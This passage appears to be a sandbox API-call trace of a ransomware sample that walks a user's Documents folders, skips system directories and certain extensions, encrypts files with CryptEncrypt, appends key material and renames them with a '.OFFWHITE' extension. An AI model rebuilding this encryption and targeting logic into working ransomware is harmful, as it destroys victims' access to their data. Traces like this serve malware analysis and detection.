[0133.971] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.OFFWHITE" [0133.971] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.offwhite")) returned 1 [0133.972] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="_private", cAlternateFileName="")) returned 1 [0133.972] lstrcmpiW (lpString1="_private", lpString2=".") returned 1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="..") returned 1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="...") returned 1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="windows") returned -1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="$recycle.bin") returned 1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="rsa") returned -1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="ntuser.dat") returned -1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="programdata") returned -1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="appdata") returned -1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="program files") returned -1 [0133.972] lstrcmpiW (lpString1="_private", lpString2="program files (x86)") returned -1 [0133.972] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0133.972] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="_private" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0133.972] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0133.972] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0133.973] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*" [0133.973] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0x29d7c977, cFileName=".", cAlternateFileName="")) returned 0x544590 [0133.974] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0133.974] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0x29d7c977, cFileName="..", cAlternateFileName="")) returned 1 [0133.974] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0133.974] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0133.975] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x295d83c, dwReserved1=0x29d7c977, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2=".") returned 1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="..") returned 1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="...") returned 1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="windows") returned -1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="$recycle.bin") returned 1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="rsa") returned -1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="ntuser.dat") returned -1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="programdata") returned -1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="appdata") returned 1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="program files") returned -1 [0133.975] lstrcmpiW (lpString1="folder.ico", lpString2="program files (x86)") returned -1 [0133.975] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0133.975] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="folder.ico" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" [0133.975] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.975] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.975] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0133.975] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0133.976] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0133.976] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0133.976] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0133.976] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0133.976] lstrcmpiW (lpString1="folder.ico", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.976] GetProcessHeap () returned 0x500000 [0133.976] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f808 [0133.976] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0133.987] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=29926) returned 1 [0133.987] GetProcessHeap () returned 0x500000 [0133.987] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.988] GetProcessHeap () returned 0x500000 [0133.988] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.988] GetProcessHeap () returned 0x500000 [0133.988] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.988] GetProcessHeap () returned 0x500000 [0133.988] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.988] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.988] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.988] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.988] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.988] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.988] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.988] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.988] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.989] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d610*=0x100) returned 1 [0133.989] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.989] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.989] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x100) returned 1 [0133.989] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x74e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.989] SetLastError (dwErrCode=0x0) [0133.989] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0133.999] GetLastError () returned 0x0 [0133.999] GetLastError () returned 0x0 [0133.999] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x75e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.000] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0134.000] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x76e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.000] WriteFile (in: hFile=0x214, lpBuffer=0x53f808*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x53f808*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0134.000] GetProcessHeap () returned 0x500000 [0134.000] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x74e6) returned 0x55b7c0 [0134.000] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.000] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x74e6, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x74e6, lpOverlapped=0x0) returned 1 [0134.009] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.009] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x74e6, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x74e6, lpOverlapped=0x0) returned 1 [0134.009] GetProcessHeap () returned 0x500000 [0134.009] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0134.009] CloseHandle (hObject=0x214) returned 1 [0134.013] GetProcessHeap () returned 0x500000 [0134.013] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.013] GetProcessHeap () returned 0x500000 [0134.013] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.013] GetProcessHeap () returned 0x500000 [0134.013] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.013] GetProcessHeap () returned 0x500000 [0134.013] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.013] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" [0134.013] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.OFFWHITE" [0134.013] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.offwhite")) returned 1 [0134.014] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x295d83c, dwReserved1=0x29d7c977, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0134.014] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0134.014] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="_private", cAlternateFileName="")) returned 0 [0134.014] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0134.015] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="...") returned 1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="$recycle.bin") returned 1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="rsa") returned -1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="ntuser.dat") returned -1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="programdata") returned -1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="appdata") returned 1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="program files") returned -1 [0134.015] lstrcmpiW (lpString1="My Videos", lpString2="program files (x86)") returned -1 [0134.015] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0134.015] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Videos" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0134.015] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0134.015] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0134.015] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0134.015] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0134.016] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2=".") returned 1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="..") returned 1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="...") returned 1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="windows") returned -1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="$recycle.bin") returned 1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="rsa") returned -1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="ntuser.dat") returned 1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="programdata") returned -1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="appdata") returned 1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="program files") returned -1 [0134.016] lstrcmpiW (lpString1="Outlook Files", lpString2="program files (x86)") returned -1 [0134.016] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0134.016] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Outlook Files" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0134.016] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0134.016] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0134.016] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*" [0134.017] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName=".", cAlternateFileName="")) returned 0x544650 [0134.020] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.020] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="..", cAlternateFileName="")) returned 1 [0134.020] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.020] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.020] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2=".") returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="..") returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="...") returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="windows") returned -1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="$recycle.bin") returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="rsa") returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="ntuser.dat") returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="programdata") returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="appdata") returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="program files") returned 1 [0134.020] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="program files (x86)") returned 1 [0134.020] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0134.020] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="voeimd@djhreuu.uhd.pst" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" [0134.020] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.020] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.020] PathFindExtensionW (pszPath="voeimd@djhreuu.uhd.pst") returned=".pst" [0134.021] lstrcmpiW 